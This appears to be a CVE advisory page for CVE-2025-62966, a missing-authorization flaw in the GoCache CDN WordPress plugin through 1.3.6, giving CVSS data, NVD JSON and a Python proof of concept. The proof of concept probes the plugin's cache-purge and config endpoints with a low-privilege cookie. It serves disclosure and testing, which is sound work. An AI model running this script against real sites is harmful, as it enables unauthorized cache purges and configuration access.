Security Vulnerability Report
中文
CVE-2025-62966 CVSS 5.4 MEDIUM

CVE-2025-62966

Published: 2025-10-27 02:15:57
Last Modified: 2026-04-27 17:16:39

Description

Missing Authorization vulnerability in Apiki GoCache gocache-cdn allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GoCache: from n/a through <= 1.3.6.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Apiki GoCache (gocache-cdn) <= 1.3.6
所有从n/a版本至1.3.6的版本均受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-62966 PoC - Missing Authorization in Apiki GoCache WordPress Plugin # Target: WordPress site with gocache-cdn plugin <= 1.3.6 def exploit_gocache(target_url, auth_cookie): """ Exploit missing authorization vulnerability in GoCache CDN plugin. This PoC demonstrates accessing admin-only cache purge functionality as a low-privilege user. """ # Target plugin endpoints that should require admin privileges endpoints = [ '/wp-json/gocache/v1/clear', '/wp-json/gocache/v1/purge', '/wp-json/gocache/v1/config', '/wp-admin/admin-ajax.php?action=gocache_clear' ] headers = { 'Cookie': auth_cookie, 'Content-Type': 'application/json', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } print(f"[*] Testing GoCache plugin endpoints on {target_url}") print(f"[*] Using authentication cookie: {auth_cookie}") print("=" * 60) for endpoint in endpoints: full_url = target_url.rstrip('/') + endpoint try: response = requests.post(full_url, headers=headers, timeout=10) print(f"\n[>] Endpoint: {endpoint}") print(f" Status Code: {response.status_code}") print(f" Response: {response.text[:200]}...") # Check if unauthorized access was successful if response.status_code == 200: print(f" [!] VULNERABLE - Low privilege user can access this endpoint!") elif response.status_code == 403: print(f" [+] Protected - Access denied (expected behavior)") else: print(f" [*] Unexpected response") except requests.RequestException as e: print(f"[!] Request failed for {endpoint}: {e}") if __name__ == '__main__': if len(sys.argv) < 3: print("Usage: python cve_2025_62966.py <target_url> <auth_cookie>") print("Example: python cve_2025_62966.py http://example.com 'wordpress_logged_in_xxx='") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_gocache(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62966", "sourceIdentifier": "[email protected]", "published": "2025-10-27T02:15:56.940", "lastModified": "2026-04-27T17:16:38.573", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Apiki GoCache gocache-cdn allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects GoCache: from n/a through <= 1.3.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/gocache-cdn/vulnerability/wordpress-gocache-plugin-1-3-6-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}